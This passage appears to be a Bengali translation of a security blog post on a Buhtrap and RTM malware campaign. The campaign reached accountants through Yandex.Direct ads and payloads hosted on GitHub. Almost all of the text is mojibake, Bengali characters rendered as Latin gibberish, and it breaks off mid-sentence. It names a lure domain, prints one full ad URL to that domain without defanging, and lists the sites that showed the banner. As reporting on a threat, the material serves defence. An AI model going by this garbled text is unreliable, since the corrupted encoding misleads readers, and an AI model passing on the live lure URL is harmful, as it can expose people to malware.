āĻ¸āĻžāĻāĻŦāĻžāĻ° āĻāĻā§āĻ°āĻŽāĻŖā§ āĻ
ā§āĻ¯āĻžāĻāĻžāĻāĻ¨ā§āĻā§āĻ¯āĻžāĻ¨ā§āĻāĻĻā§āĻ° āĻ˛āĻā§āĻˇā§āĻ¯ āĻāĻ°āĻ¤ā§, āĻāĻĒāĻ¨āĻŋ āĻāĻžāĻā§āĻ° āĻ¨āĻĨāĻŋāĻā§āĻ˛āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨ āĻ¯āĻž āĻ¤āĻžāĻ°āĻž āĻ
āĻ¨āĻ˛āĻžāĻāĻ¨ā§ āĻ
āĻ¨ā§āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻāĻ°ā§āĨ¤ āĻāĻāĻŋ āĻŽā§āĻāĻžāĻŽā§āĻāĻŋ āĻ¯āĻž āĻāĻāĻāĻŋ āĻ¸āĻžāĻāĻŦāĻžāĻ° āĻā§āĻ°ā§āĻĒ āĻāĻ¤ āĻāĻ¯āĻŧā§āĻ āĻŽāĻžāĻ¸ āĻ§āĻ°ā§ āĻāĻ°āĻā§, āĻĒāĻ°āĻŋāĻāĻŋāĻ¤ āĻŦā§āĻ¯āĻžāĻāĻĄā§āĻ° āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻā§āĨ¤
āĻŦā§āĻšāĻā§āĻ°ā§āĻ¯āĻžāĻĒā§āĻ° āĻ¸ā§āĻ°ā§āĻ¸ āĻā§āĻĄ āĻ āĻ¤ā§āĻ¤ā§ āĻ āĻ¨āĻ˛āĻžāĻāĻ¨ā§ āĻĢāĻžāĻāĻ¸ āĻšāĻ¯āĻŧā§āĻā§ āĻ¯āĻžāĻ¤ā§ āĻ¯ā§ āĻā§āĻ āĻāĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻā§ āĻāĻ°āĻāĻŋāĻāĻŽ āĻā§āĻĄ āĻāĻĒāĻ˛āĻŦā§āĻ§āĻ¤āĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻŋāĻ¤ āĻā§āĻ¨ āĻ¤āĻĨā§āĻ¯ āĻ¨ā§āĻāĨ¤
āĻāĻ āĻĒā§āĻ¸ā§āĻā§ āĻāĻŽāĻ°āĻž āĻāĻĒāĻ¨āĻžāĻā§ āĻŦāĻ˛āĻŦ āĻāĻŋāĻāĻžāĻŦā§ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ°āĻž Yandex.Direct āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°ā§āĻā§ āĻāĻŦāĻ āĻāĻāĻŋ GitHub-āĻ āĻšā§āĻ¸ā§āĻ āĻāĻ°ā§āĻā§ā§ˇ āĻĒā§āĻ¸ā§āĻāĻāĻŋ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°ā§āĻ° āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋāĻāĻ¤ āĻŦāĻŋāĻļā§āĻ˛ā§āĻˇāĻŖ āĻĻāĻŋāĻ¯āĻŧā§ āĻļā§āĻˇ āĻšāĻŦā§āĨ¤
āĻŦā§āĻšāĻā§āĻ°ā§āĻ¯āĻžāĻĒ āĻāĻŦāĻ āĻāĻ°āĻāĻŋāĻāĻŽ āĻŦā§āĻ¯āĻŦāĻ¸āĻžāĻ¯āĻŧ āĻĢāĻŋāĻ°ā§ āĻāĻ¸ā§āĻā§
āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ° āĻāĻŦāĻ āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž
āĻā§āĻˇāĻ¤āĻŋāĻā§āĻ°āĻ¸ā§āĻĨāĻĻā§āĻ° āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻž āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻĒā§āĻ˛ā§āĻĄ āĻāĻāĻāĻŋ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻĒā§āĻ°āĻāĻžāĻ° āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻāĻžāĻ āĻāĻ°ā§āĨ¤ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¤ā§āĻ°āĻŋ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻĻā§āĻˇāĻŋāĻ¤ āĻĢāĻžāĻāĻ˛ āĻĻā§āĻāĻŋ āĻāĻŋāĻ¨ā§āĻ¨ GitHub āĻ¸āĻāĻā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛ā§ āĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤
āĻ¸āĻžāĻ§āĻžāĻ°āĻŖāĻ¤, āĻ¸āĻāĻā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛ā§ āĻāĻāĻāĻŋ āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄāĻ¯ā§āĻā§āĻ¯ āĻĻā§āĻˇāĻŋāĻ¤ āĻĢāĻžāĻāĻ˛ āĻĨāĻžāĻā§, āĻ¯āĻž āĻāĻ¨ āĻāĻ¨ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻŋāĻ¤ āĻšāĻ¯āĻŧāĨ¤ āĻ¯ā§āĻšā§āĻ¤ā§ GitHub āĻāĻĒāĻ¨āĻžāĻā§ āĻāĻāĻāĻŋ āĻ¸āĻāĻā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛ā§ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ā§āĻ° āĻāĻ¤āĻŋāĻšāĻžāĻ¸ āĻĻā§āĻāĻ¤ā§ āĻĻā§āĻ¯āĻŧ, āĻ¤āĻžāĻ āĻāĻŽāĻ°āĻž āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ°āĻŋ āĻāĻāĻāĻŋ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻ¸āĻŽāĻ¯āĻŧā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻā§ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻā§āĻˇāĻ¤āĻŋāĻāĻžāĻ°āĻāĻā§ āĻĻā§āĻˇāĻŋāĻ¤ āĻĢāĻžāĻāĻ˛āĻāĻŋ āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄ āĻāĻ°āĻ¤ā§ āĻ°āĻžāĻāĻŋ āĻāĻ°āĻžāĻ¤ā§, āĻāĻĒāĻ°ā§āĻ° āĻāĻŋāĻ¤ā§āĻ°ā§ āĻĻā§āĻāĻžāĻ¨ā§ āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻ blanki-shabloni24[.]ru āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤
āĻ¸āĻžāĻāĻā§āĻ° āĻĄāĻŋāĻāĻžāĻāĻ¨ āĻāĻŦāĻ āĻĻā§āĻˇāĻŋāĻ¤ āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋāĻ° āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻ¨āĻžāĻŽ āĻāĻāĻāĻŋ āĻāĻāĻ āĻ§āĻžāĻ°āĻŖāĻž āĻ āĻ¨ā§āĻ¸āĻ°āĻŖ āĻāĻ°ā§ - āĻĢāĻ°ā§āĻŽ, āĻā§āĻŽāĻĒā§āĻ˛ā§āĻ, āĻā§āĻā§āĻ¤āĻŋ, āĻ¨āĻŽā§āĻ¨āĻž, āĻāĻ¤ā§āĻ¯āĻžāĻĻāĻŋāĨ¤ āĻŦāĻŋāĻŦā§āĻāĻ¨āĻž āĻāĻ°ā§ āĻ¯ā§ āĻŦā§āĻšāĻā§āĻ°ā§āĻ¯āĻžāĻĒ āĻāĻŦāĻ āĻāĻ°āĻāĻŋāĻāĻŽ āĻ¸āĻĢā§āĻāĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻāĻ¤āĻŋāĻŽāĻ§ā§āĻ¯ā§āĻ āĻ ā§āĻ¯āĻžāĻāĻžāĻāĻ¨ā§āĻā§āĻ¯āĻžāĻ¨ā§āĻāĻĻā§āĻ° āĻāĻĒāĻ° āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§, āĻāĻŽāĻ°āĻž āĻ§āĻ°ā§ āĻ¨āĻŋāĻ¯āĻŧā§āĻāĻŋ āĻ¯ā§ āĻ¨āĻ¤ā§āĻ¨ āĻ āĻāĻŋāĻ¯āĻžāĻ¨ā§ āĻā§āĻļāĻ˛ āĻāĻāĻāĨ¤ āĻāĻāĻŽāĻžāĻ¤ā§āĻ° āĻĒā§āĻ°āĻļā§āĻ¨ āĻšāĻ˛ āĻāĻŋāĻāĻāĻŋāĻŽ āĻāĻŋāĻāĻžāĻŦā§ āĻšāĻžāĻŽāĻ˛āĻžāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻ¸āĻžāĻāĻā§ āĻā§āĻ˛āĨ¤
āĻ¸āĻāĻā§āĻ°āĻŽāĻŖ
āĻ āĻ¨ā§āĻ¤āĻ¤ āĻŦā§āĻļ āĻāĻ¯āĻŧā§āĻāĻāĻ¨ āĻ¸āĻŽā§āĻāĻžāĻŦā§āĻ¯ āĻļāĻŋāĻāĻžāĻ° āĻ¯āĻžāĻ°āĻž āĻāĻ āĻ¸āĻžāĻāĻā§ āĻļā§āĻˇ āĻšāĻ¯āĻŧā§āĻā§ āĻ¤āĻžāĻ°āĻž āĻĻā§āĻˇāĻŋāĻ¤ āĻŦāĻŋāĻā§āĻāĻžāĻĒāĻ¨ āĻĻā§āĻŦāĻžāĻ°āĻž āĻāĻā§āĻˇā§āĻ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻ¨ā§āĻā§ āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ŅĐēĐ°ŅĐ°ŅŅ ĐąĐģĐ°ĐŊĐē ŅŅĐĩŅĐ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
āĻāĻĒāĻ¨āĻŋ āĻ˛āĻŋāĻā§āĻ āĻĨā§āĻā§ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻā§āĻā§āĻ¨, āĻŦā§āĻ¯āĻžāĻ¨āĻžāĻ°āĻāĻŋ āĻŦā§āĻ§ āĻ ā§āĻ¯āĻžāĻāĻžāĻāĻ¨ā§āĻāĻŋāĻ āĻĢā§āĻ°āĻžāĻŽ bb.f2[.]kz-āĻ āĻĒā§āĻ¸ā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§āĨ¤ āĻāĻāĻŋ āĻ˛āĻā§āĻˇ āĻāĻ°āĻž āĻā§āĻ°ā§āĻ¤ā§āĻŦāĻĒā§āĻ°ā§āĻŖ āĻ¯ā§ āĻŦā§āĻ¯āĻžāĻ¨āĻžāĻ°āĻā§āĻ˛āĻŋ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻ¸āĻžāĻāĻā§ āĻĒā§āĻ°āĻĻāĻ°ā§āĻļāĻŋāĻ¤ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛, āĻ¸āĻāĻ˛ā§āĻ° āĻāĻāĻ āĻĒā§āĻ°āĻāĻžāĻ°āĻžāĻāĻŋāĻ¯āĻžāĻ¨ āĻāĻāĻĄāĻŋ (blanki_rsya) āĻāĻŋāĻ˛ āĻāĻŦāĻ āĻŦā§āĻļāĻŋāĻ°āĻāĻžāĻ āĻ ā§āĻ¯āĻžāĻāĻžāĻāĻ¨ā§āĻāĻŋāĻ āĻŦāĻž āĻāĻāĻ¨āĻŋ āĻ¸āĻšāĻžāĻ¯āĻŧāĻ¤āĻž āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻžāĻā§āĻ˛āĻŋāĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻŋāĻ¤ā§ˇ URL āĻĻā§āĻāĻžāĻ¯āĻŧ āĻ¯ā§ āĻ¸āĻŽā§āĻāĻžāĻŦā§āĻ¯ āĻļāĻŋāĻāĻžāĻ° "āĻāĻžāĻ˛āĻžāĻ¨ āĻĢāĻ°ā§āĻŽ āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄ āĻāĻ°ā§āĻ¨" āĻ āĻ¨ā§āĻ°ā§āĻ§āĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻā§, āĻ¯āĻž āĻ˛āĻā§āĻˇā§āĻ¯āĻ¯ā§āĻā§āĻ¤ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻāĻŽāĻžāĻĻā§āĻ° āĻ āĻ¨ā§āĻŽāĻžāĻ¨āĻā§ āĻ¸āĻŽāĻ°ā§āĻĨāĻ¨ āĻāĻ°ā§āĨ¤ āĻ¨ā§āĻā§ āĻŦā§āĻ¯āĻžāĻ¨āĻžāĻ° āĻĒā§āĻ°āĻĻāĻ°ā§āĻļāĻŋāĻ¤ āĻ¸āĻžāĻāĻ āĻāĻŦāĻ āĻ¸āĻāĻļā§āĻ˛āĻŋāĻˇā§āĻ āĻ āĻ¨ā§āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻā§āĻ¯ā§āĻ¯āĻŧāĻžāĻ°ā§ āĻāĻā§.
- āĻāĻžāĻ˛āĻžāĻ¨ āĻĢāĻ°ā§āĻŽ āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄ āĻāĻ°ā§āĻ¨ â bb.f2[.]kz
- āĻ¨āĻŽā§āĻ¨āĻž āĻā§āĻā§āĻ¤āĻŋ - Ipopen[.]ru
- āĻāĻŦā§āĻĻāĻ¨ā§āĻ° āĻ āĻāĻŋāĻ¯ā§āĻā§āĻ° āĻ¨āĻŽā§āĻ¨āĻž - 77metrov[.]ru
- āĻā§āĻā§āĻ¤āĻŋāĻ° āĻĢāĻ°ā§āĻŽ - āĻĢāĻžāĻāĻāĻž-āĻĄā§āĻā§āĻāĻžāĻ°-āĻā§āĻĒāĻ˛āĻŋ-āĻĒā§āĻ°āĻĻāĻžāĻāĻŋ[.]āĻāĻ°āĻāĻ
- āĻ¨āĻŽā§āĻ¨āĻž āĻāĻĻāĻžāĻ˛āĻ¤ā§āĻ° āĻĒāĻŋāĻāĻŋāĻļāĻ¨ - zen.yandex[.]ru
- āĻ¨āĻŽā§āĻ¨āĻž āĻ āĻāĻŋāĻ¯ā§āĻ - yurday[.]ru
- āĻ¨āĻŽā§āĻ¨āĻž āĻā§āĻā§āĻ¤āĻŋ āĻĢāĻ°ā§āĻŽ - Regforum [.]ru
- āĻā§āĻā§āĻ¤āĻŋ āĻĢāĻ°ā§āĻŽ - āĻ¸āĻšāĻāĻžāĻ°ā§ [.]āĻāĻ°āĻāĻ
- āĻ¨āĻŽā§āĻ¨āĻž āĻ ā§āĻ¯āĻžāĻĒāĻžāĻ°ā§āĻāĻŽā§āĻ¨ā§āĻ āĻā§āĻā§āĻ¤āĻŋ â napravah[.]com
- āĻāĻāĻ¨āĻŋ āĻā§āĻā§āĻ¤āĻŋāĻ° āĻ¨āĻŽā§āĻ¨āĻž - avito[.]ru
blanki-shabloni24[.]ru āĻ¸āĻžāĻāĻāĻāĻŋ āĻāĻāĻāĻŋ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻāĻŋāĻā§āĻ¯ā§āĻ¯āĻŧāĻžāĻ˛ āĻ ā§āĻ¯āĻžāĻ¸ā§āĻ¸āĻŽā§āĻ¨ā§āĻ āĻĒāĻžāĻ¸ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻ¨āĻĢāĻŋāĻāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖāĻ¤, GitHub-āĻāĻ° āĻ˛āĻŋāĻā§āĻ āĻ¸āĻš āĻāĻāĻāĻŋ āĻĒā§āĻļāĻžāĻĻāĻžāĻ°-āĻ¸ā§āĻĻāĻ°ā§āĻļāĻ¨ āĻ¸āĻžāĻāĻā§āĻ° āĻĻāĻŋāĻā§ āĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻāĻ°ā§ āĻāĻŽāĻ¨ āĻāĻāĻāĻŋ āĻŦāĻŋāĻā§āĻāĻžāĻĒāĻ¨ āĻ¸ā§āĻĒāĻˇā§āĻāĻ¤āĻ āĻāĻžāĻ°āĻžāĻĒ āĻāĻŋāĻā§ āĻŦāĻ˛ā§ āĻŽāĻ¨ā§ āĻšāĻ¯āĻŧ āĻ¨āĻžāĨ¤ āĻāĻĒāĻ°āĻ¨ā§āĻ¤ā§, āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ°āĻž āĻĒā§āĻ°āĻāĻžāĻ°āĻŖāĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ āĻ¸āĻŽā§āĻāĻŦāĻ¤ āĻ¸ā§āĻŽāĻŋāĻ¤ āĻ¸āĻŽāĻ¯āĻŧā§āĻ° āĻāĻ¨ā§āĻ¯ āĻ°āĻŋāĻĒā§āĻāĻŋāĻāĻ°āĻŋāĻ¤ā§ āĻĻā§āĻˇāĻŋāĻ¤ āĻĢāĻžāĻāĻ˛ āĻāĻĒāĻ˛ā§āĻĄ āĻāĻ°ā§āĻā§āĨ¤ āĻŦā§āĻļāĻŋāĻ°āĻāĻžāĻ āĻ¸āĻŽāĻ¯āĻŧ, GitHub āĻ¸āĻāĻā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛ā§ āĻāĻāĻāĻŋ āĻāĻžāĻ˛āĻŋ āĻāĻŋāĻĒ āĻ¸āĻāĻ°āĻā§āĻˇāĻŖāĻžāĻāĻžāĻ° āĻŦāĻž āĻāĻāĻāĻŋ āĻĢāĻžāĻāĻāĻž EXE āĻĢāĻžāĻāĻ˛ āĻĨāĻžāĻā§āĨ¤ āĻāĻāĻāĻžāĻŦā§, āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ°āĻž Yandex.Direct-āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻŦāĻŋāĻā§āĻāĻžāĻĒāĻ¨ āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻāĻŽāĻ¨ āĻ¸āĻžāĻāĻāĻā§āĻ˛āĻŋāĻ¤ā§ āĻ¯āĻž āĻ¸āĻŽā§āĻāĻŦāĻ¤ āĻ ā§āĻ¯āĻžāĻāĻžāĻāĻ¨ā§āĻā§āĻ¯āĻžāĻ¨ā§āĻāĻĻā§āĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻĒāĻ°āĻŋāĻĻāĻ°ā§āĻļāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛ āĻ¯āĻžāĻ°āĻž āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻ āĻ¨ā§āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻĒā§āĻ°āĻļā§āĻ¨ā§āĻ° āĻāĻ¤ā§āĻ¤āĻ°ā§ āĻāĻ¸ā§āĻā§āĻ¨āĨ¤
āĻāĻ° āĻĒāĻ°ā§, āĻāĻ¸ā§āĻ¨ āĻāĻāĻāĻžāĻŦā§ āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻž āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻĒā§āĻ˛ā§āĻĄāĻā§āĻ˛āĻŋ āĻĻā§āĻā§āĻ¨āĨ¤
āĻĒā§āĻ˛ā§āĻĄ āĻŦāĻŋāĻļā§āĻ˛ā§āĻˇāĻŖ
āĻŦāĻŋāĻ¤āĻ°āĻŖā§āĻ° āĻāĻžāĻ˛āĻžāĻ¨ā§āĻā§āĻ°āĻŽ
āĻĻā§āĻˇāĻŋāĻ¤ āĻĒā§āĻ°āĻāĻžāĻ°āĻŖāĻž āĻ āĻā§āĻā§āĻŦāĻ° 2018 āĻāĻ° āĻļā§āĻˇā§ āĻļā§āĻ°ā§ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛ āĻāĻŦāĻ āĻ˛ā§āĻāĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ āĻ¸āĻā§āĻ°āĻŋāĻ¯āĻŧ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤ āĻ¯ā§āĻšā§āĻ¤ā§ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ āĻ¸āĻāĻā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛āĻāĻŋ GitHub-āĻ āĻ¸āĻ°ā§āĻŦāĻāĻ¨ā§āĻ¨āĻāĻžāĻŦā§ āĻāĻĒāĻ˛āĻŦā§āĻ§ āĻāĻŋāĻ˛, āĻ¤āĻžāĻ āĻāĻŽāĻ°āĻž āĻāĻ¯āĻŧāĻāĻŋ āĻāĻŋāĻ¨ā§āĻ¨ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻĒāĻ°āĻŋāĻŦāĻžāĻ°ā§āĻ° āĻŦāĻŋāĻ¤āĻ°āĻŖā§āĻ° āĻāĻāĻāĻŋ āĻ¸āĻ āĻŋāĻ āĻāĻžāĻāĻŽāĻ˛āĻžāĻāĻ¨ āĻ¸āĻāĻāĻ˛āĻ¨ āĻāĻ°ā§āĻāĻŋ (āĻ¨ā§āĻā§āĻ° āĻāĻŋāĻ¤ā§āĻ°āĻāĻŋ āĻĻā§āĻā§āĻ¨)āĨ¤ āĻāĻŋāĻ āĻāĻ¤āĻŋāĻšāĻžāĻ¸ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¤ā§āĻ˛āĻ¨āĻž āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ ESET āĻā§āĻ˛āĻŋāĻŽā§āĻā§āĻ°āĻŋ āĻĻā§āĻŦāĻžāĻ°āĻž āĻĒāĻ°āĻŋāĻŽāĻžāĻĒ āĻāĻ°āĻž āĻŦā§āĻ¯āĻžāĻ¨āĻžāĻ° āĻ˛āĻŋāĻā§āĻāĻāĻŋ āĻāĻāĻ¨ āĻāĻŦāĻŋāĻˇā§āĻā§āĻ¤ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛ āĻ¤āĻž āĻĻā§āĻāĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻŽāĻ°āĻž āĻāĻāĻāĻŋ āĻ˛āĻžāĻāĻ¨ āĻ¯ā§āĻ āĻāĻ°ā§āĻāĻŋāĨ¤ āĻāĻĒāĻ¨āĻŋ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻā§āĻā§āĻ¨, āĻāĻāĻŋ āĻāĻŋāĻāĻšāĻžāĻŦā§āĻ° āĻĒā§āĻ˛ā§āĻĄā§āĻ° āĻĒā§āĻ°āĻžāĻĒā§āĻ¯āĻ¤āĻžāĻ° āĻ¸āĻžāĻĨā§ āĻāĻžāĻ˛ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻ¯ā§āĻā§āĻ¤āĨ¤ āĻĢā§āĻŦā§āĻ°ā§āĻ¯āĻŧāĻžāĻ°āĻŋāĻ° āĻļā§āĻˇā§āĻ° āĻĻāĻŋāĻā§āĻ° āĻ āĻ¸āĻā§āĻāĻ¤āĻŋāĻāĻŋ āĻāĻ āĻ¸āĻ¤ā§āĻ¯ āĻĻā§āĻŦāĻžāĻ°āĻž āĻŦā§āĻ¯āĻžāĻā§āĻ¯āĻž āĻāĻ°āĻž āĻ¯ā§āĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻ¯ā§ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻā§ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ā§āĻ° āĻāĻ¤āĻŋāĻšāĻžāĻ¸ā§āĻ° āĻ āĻāĻļ āĻāĻŋāĻ˛ āĻ¨āĻž āĻāĻžāĻ°āĻŖ āĻāĻŽāĻ°āĻž āĻāĻāĻŋ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖāĻ°ā§āĻĒā§ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻā§ āĻāĻŋāĻāĻšāĻžāĻŦ āĻĨā§āĻā§ āĻ¸āĻāĻā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛āĻāĻŋ āĻ¸āĻ°āĻžāĻ¨ā§ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤
āĻāĻŋāĻ¤ā§āĻ° 1. āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻŦāĻŋāĻ¤āĻ°āĻŖā§āĻ° āĻāĻžāĻ˛āĻžāĻ¨ā§āĻā§āĻ°āĻŽāĨ¤
āĻā§āĻĄ āĻ¸āĻžāĻāĻ¨āĻŋāĻ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻĢāĻŋāĻā§āĻ
āĻā§āĻ¯āĻžāĻŽā§āĻĒā§āĻāĻ¨ā§ āĻāĻāĻžāĻ§āĻŋāĻ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻĢāĻŋāĻā§āĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§āĨ¤ āĻāĻŋāĻā§āĻ¤ā§ āĻāĻāĻžāĻ§āĻŋāĻ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻĒāĻ°āĻŋāĻŦāĻžāĻ°ā§āĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¸ā§āĻŦāĻžāĻā§āĻˇāĻ°āĻŋāĻ¤ āĻšāĻ¯āĻŧā§āĻā§, āĻ¯āĻž āĻāĻ°āĻ āĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻāĻ°ā§ āĻ¯ā§ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻ¨āĻŽā§āĻ¨āĻž āĻāĻāĻ āĻĒā§āĻ°āĻāĻžāĻ°āĻžāĻāĻŋāĻ¯āĻžāĻ¨ā§āĻ° āĻ āĻ¨ā§āĻ¤āĻ°ā§āĻāĻ¤āĨ¤ āĻĒā§āĻ°āĻžāĻāĻā§āĻ āĻā§ āĻāĻĒāĻ˛āĻŦā§āĻ§ āĻĨāĻžāĻāĻž āĻ¸āĻ¤ā§āĻ¤ā§āĻŦā§āĻ, āĻ āĻĒāĻžāĻ°ā§āĻāĻ°āĻ°āĻž āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻāĻ¤āĻāĻžāĻŦā§ āĻŦāĻžāĻāĻ¨āĻžāĻ°āĻŋāĻā§āĻ˛āĻŋāĻ¤ā§ āĻ¸ā§āĻŦāĻžāĻā§āĻˇāĻ° āĻāĻ°ā§āĻ¨āĻŋ āĻāĻŦāĻ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻ¨āĻŽā§āĻ¨āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻā§ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻ¨āĻŋāĨ¤ āĻĢā§āĻŦā§āĻ°ā§āĻ¯āĻŧāĻžāĻ°ā§ 2019 āĻāĻ° āĻļā§āĻˇā§āĻ° āĻĻāĻŋāĻā§, āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ°āĻž āĻāĻāĻāĻŋ Google-āĻŽāĻžāĻ˛āĻŋāĻāĻžāĻ¨āĻžāĻ§ā§āĻ¨ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻ āĻŦā§āĻ§ āĻ¸ā§āĻŦāĻžāĻā§āĻˇāĻ° āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻ¤ā§ 